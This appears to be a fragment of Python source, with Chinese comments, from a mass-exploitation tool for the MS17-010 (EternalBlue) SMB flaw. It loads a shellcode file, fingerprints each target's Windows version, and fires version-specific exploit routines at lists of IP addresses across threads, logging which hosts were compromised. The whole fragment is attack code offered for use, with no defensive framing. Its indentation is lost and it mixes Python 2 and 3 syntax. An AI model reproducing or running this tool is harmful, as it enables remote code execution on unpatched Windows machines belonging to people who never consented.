def checkOne(*pl):
logger.log.debug("checkOne...")
#消费者线程
checker.checkTh(addrsQueue,checkQueue,Param['threads'],checkResultDic,checkThList)
#检测一个
for addr in ipaddrsDic['ipaddrs']:
logger.log.info('check target:%s user:%s pwd:%s'%(addr,Param['user'],Param['pwd']))
checkResult = ''
try:
checkResult = checker.checkVuln(str(addr),Param['user'],Param['pwd'])
except Exception as e:
#doorSocket.close()
logger.log.warning(str(e))
logger.log.info(str(addr) + "***" + str(checkResult))
if(len(userList) != 0):
#读取结果
rth = resultTh.resultTh(checkQueue,"CHECKONE",1)
rth.setDaemon(True)
rth.start()
#启动线程检测用户配置字典
genTask(addr)
for t in checkThList:
t.join()
def run(self):
#加载shellcode
result7 = ''
result8 = ''
with open(self.shellcodePath, 'rb') as fp:
sc = fp.read()
if len(sc) > 0xe80:
logger.log.debug(
'Shellcode too long. The place that this exploit put a shellcode is limited to {} bytes.'
.format(0xe80))
else:
#fp.close()
#while结构内,一直监听此端口直到程序结束
while (True):
try:
#ckItem = self.checkQueue.get(True,1)
#writeContent2File("checkReult.txt",str(ckItem))
try:
item = self.blueQueue.get(True, 3)
except Exception, ex:
break
target = item['addr']
logger.log.info('blue attack target:%s ' % target)
try:
checkResult = checker.checkVuln(target, '', '')
server_os = checkResult['OS']
if (server_os.startswith("Windows 7 ")
or (server_os.startswith("Windows Server ")
and ' 2008 ' in server_os)
or server_os.startswith("Windows Vista")):
result7 = expblue7.exploit(str(target), sc, 13)
elif (server_os.startswith("Windows 8")
or server_os.startswith("Windows Server 2012 ")):
result8 = expblue8.exploit(str(target), sc, 13)
elif server_os.startswith("Windows 10 "):
build = int(server_os.split()[-1])
if build >= 14393:
result8 = expblue8.exploit(str(target), sc, 13)
else:
logger.log.info(
'blue attack do not support this os:%s' %
server_os)
except Exception as e:
#doorSocket.close()
logger.log.warning(str(e))
#result7 = expblue7.exploit(target , sc ,13)
#result8 = expblue8.exploit(target , sc ,13)
if (result7 != ''):
self.resultQueue.put(item, True)
if (result8 != ''):
self.resultQueue.put(item, True)
logger.log.info("\n blueAttack is finished!")
except Exception as e:
#doorSocket.close()
logger.log.warning(str(e))
def firstAttack():
addr = Param['addr']
logger.log.info('check target:%s user:%s pwd:%s'%(addr,Param['user'],Param['pwd']))
expResult = ''
try:
checkResult = checker.checkVuln(addr,Param['user'],Param['pwd'])
expResult = ExpMs17010.exploit(addr,Param['user'],Param['pwd'])
except Exception as e:
#doorSocket.close()
logger.log.warning(str(e))
if expResult == '':
logger.log.info(addr + " FAILURE!")
else:
logger.log.info(addr + " SUCCEED!")
def blueAttackOne(*pl):
logger.log.debug("blueAttackOne...")
#global sc
#fp = open(shellcodePath,'rb')
#sc = fp.read()
#fp.close()
with open(shellcodePath, 'rb') as fp:
sc = fp.read()
if len(sc) > 0xe80:
logger.log.debug(
'Shellcode too long. The place that this exploit put a shellcode is limited to {} bytes.'
.format(0xe80))
for target in ipaddrsDic['ipaddrs']:
#target = Param['addr']
logger.log.info('check target:%s ' % target)
result7 = ''
result8 = ''
try:
checkResult = checker.checkVuln(str(target), '', '')
server_os = checkResult['OS']
logger.log.info(str(target) + " " + server_os)
if (server_os.startswith("Windows 7 ")
or (server_os.startswith("Windows Server ")
and ' 2008 ' in server_os)
or server_os.startswith("Windows Vista")):
result7 = expblue7.exploit(str(target), sc, 13)
elif (server_os.startswith("Windows 8")
or server_os.startswith("Windows Server 2012 ")):
result8 = expblue8.exploit(str(target), sc, 13)
elif server_os.startswith("Windows 10 "):
build = int(server_os.split()[-1])
if build >= 14393:
result8 = expblue8.exploit(str(target), sc, 13)
else:
logger.log.info('blue attack do not support this os:%s' %
server_os)
except Exception as e:
#doorSocket.close()
logger.log.warning(str(e))
if (result7 != ''):
logger.log.info("%s blueAttack is good!" % target)
elif (result8 != ''):
logger.log.info("%s blueAttack is good!" % target)
else:
logger.log.info("%s blueAttack is failure!" % target)
logger.log.info("\n blueAttack is finished!")